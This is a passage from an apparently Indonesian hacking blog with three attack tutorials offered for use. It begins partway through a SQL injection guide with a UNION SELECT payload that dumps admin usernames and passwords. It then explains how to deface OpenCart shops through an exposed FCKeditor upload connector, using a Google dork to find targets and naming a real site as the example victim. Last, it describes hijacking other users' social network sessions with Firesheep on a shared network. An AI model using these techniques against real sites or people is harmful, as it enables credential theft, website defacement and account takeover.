[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login .


Silahkan DI pelajari Kaka 1 .


======================================
Author : Gonzhack | Indonesian Coder
Posted : MISTERFRIBO | Indonesian Coder & Hacker Team

http://www.indonesianhacker.or.id/ - http://indonesiancoder.com/ - http://jatimcrew.org/

Senin, 28 Februari 2011

Remote File Upload Opencart (deface)

wah ada mainan baru nie,,,heheeh...
teknik Remote File Upload Opencart ini sangat mudah di mengerti bagi newbie seperti saya yang ingin memulai deface web dengan mudah...
kamu hanya perlu mencari situs yang suport opencart,..
langsung aja yah kyanya pada gk sabar dengan Remote File Upload Opencart ini,,,:P

seperti biasa nyarinya lewat paman google
dork nya :Powered By OpenCart site:com (site nya bisa kamu ganti,seperti my,il, dll yang penting suport opencart)
klo pengen smuanya,site nya ilangun jadi gini aja Powered By OpenCart

langsung ke caranya,,
jika kamu sudah mendapatkan target nya
contoh target http://hipoint9mm.com/shop/
bisa juga http://hipoint9mm.com/cart/ , http://hipoint9mm.com/patch/ dll

klo udah dapet targetnya tinggal kita inject exploitnya
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

jadi seperti ini,
http://www.hipoint9mm.com/shop/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
klo ketemu yang kya gini http://www.hipoint9mm.com/shop/ kamu inject di blakang /shop/ nya..

maka akan muncul tampilan seperti ini..

jangan lupa connectornya di ganti jadi PHP.
lalu kamu masukin file deface kamu,jika berhasil maka ada bacaan alert seperti ini "file uploaded with no errors"

untuk melihat apakan berhasil di upload atau tidak kamu ke "Get Folders and Files" dan lihat hasilnya... :P

jika berhasil kamu tinggal masukin nama file deface kamu di blakang site nya,,
maka hasilnya seperti ini..
http://www.hipoint9mm.com/pajenx.htm



code: SUMBER

Hijacking social networking Dengan Firesheep

wah cara lama tapi lumayan lah wat iseng2...
okeh,,firesheep ini sebuah addons firefox,nah fireshep ini bisa melihat FB atau social network yang di buka komputer lain dalam satu network,,,kamu juga bisa merubah isi FB orang,,asik kan,,,




cara kerja firesheep dengan membaca cookies dari komputer yang membuka social network..




siapapun orang yang menggunakan social network dalam satu jaringan maka mreka akan bisa di lihat menggunakan firesheep..



Double-klik pada seseorang, dan Anda langsung login sebagai mereka.
gampang kan,,,
mau coba ,,???
nie langsung sedot aja ...
firesheep
winpcap

caranya pertama insstal winpcap setelah itu download dan instalkan firesheepnya pada addons mozzila,restar mozzila anda dan akan muncul di tab kiri mozzila anda firesheep dan start capture,..